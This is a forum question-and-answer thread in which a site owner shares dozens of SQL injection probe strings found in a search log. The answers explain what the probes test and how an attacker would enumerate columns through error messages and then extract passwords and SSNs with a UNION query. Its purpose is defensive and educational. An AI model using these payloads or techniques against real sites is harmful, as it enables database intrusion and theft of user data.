Purpose of SQL injection


So, we have a search field on our website, and I save every search term to a database table.
Today I opened the search-terms table and found some strange searches; clearly someone is trying to break our database. There were more than 200 such searches today alone.

They all seem to be variations on a theme:

999999.9) union all select 1 and (0=0
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 
999999.9 union all select /**/cOnCaT(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21) 
999999.9 union all select 1 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39-- 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39-- 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39-- 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39-- 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39-- 
999999.9 union all select /**/cOnCaT(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21)-- 
999999.9 union all select 1-- 
999999.9" /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39 and "0"="0 
999999.9" /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39 and "0"="0 
999999.9" /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and "0"="0 
999999.9" /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and "0"="0 
999999.9" /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and "0"="0 
999999.9" union all select /**/cOnCaT(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21) and "0"="0 
999999.9" union all select 1 and "0"="0 
999999.9' /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39 and '0'='0 
999999.9' /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39 and '0'='0 
999999.9' /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and '0'='0 
999999.9' /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and '0'='0 
999999.9' /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and '0'='0 
999999.9' union all select /**/cOnCaT(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21) and '0'='0 
999999.9' union all select 1 and '0'='0 
999999.9) /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39 and (0=0) 
999999.9) /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39 and (0=0) 
999999.9) /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and (0=0) 
999999.9) /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and (0=0) 
999999.9) /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and (0=0) 
999999.9) union all select /**/cOnCaT(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21) and (0=0) 
999999.9) union all select 1 and (0=0) 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39
labor op99999' union select unhex(hex(version())) -- 'x'='x
labor op99999' union select unhex(hex(version())) -- 'x'='x

Our site search uses parameterized queries, and I tried pasting a few of these in myself, so I don't think they got anything, but I'm really curious what they were trying to get.

Answer 1

I'm really curious what they were trying to get.

Nothing, at first. These are just probes. They are only trying to see whether your service produces an unexpected result, which would indicate that it can't handle the input. There may not even be a real person at the keyboard; it could simply be a script working through various possibilities.

However, if any of those probes had actually succeeded, the nature of the attack would change, and you would start seeing attempts to do something more malicious.

I wouldn't wait for that to happen, even if you're sure it won't. Check your logs to see where the attack is coming from and, if possible, block that user or IP from seeing your system.

Answer 2

Submitting a union all clause probes for both an injection vulnerability and the structure of the query. Using postgres (because that's what I have on hand):

(unknown website query)    
/**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39

ERROR:  each UNION query must have the same number of columns
LINE 2: /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39
                                ^
********** Error **********

ERROR: each UNION query must have the same number of columns

If your website forwards this error message, I learn that 1) the SQL injection succeeded, and 2) the unknown website query selects more than one column. So now I try two columns, three columns, and so on, until I receive a different error message, such as:

ERROR:  UNION types text and integer cannot be matched
LINE 2: /**/aLl /**/sElEcT 0x393133363636353631352e39, 0

Now I know the SQL injection works, and I also know that col_1 or col_2 of the query returns text data. Pretty soon I would have figured out where the injection point is, how many columns are returned, and the data type of each column.

Next, I might try a UNION against common table names that could hold valuable information, such as user:

(unknown website query)    
union all select user_id, password, ssn from user

The hacker also appears to be checking whether comment syntax can be injected: /**/ and --. That is useful because it could be used to modify the query by commenting out and replacing parts of it.

I'd guess the unusual capitalization makes it easier for the hacker to find vulnerabilities automatically, by searching the website's response for that unique string. There is more going on here that I don't fully understand, but I hope this gives you a general idea of how your site is being probed.
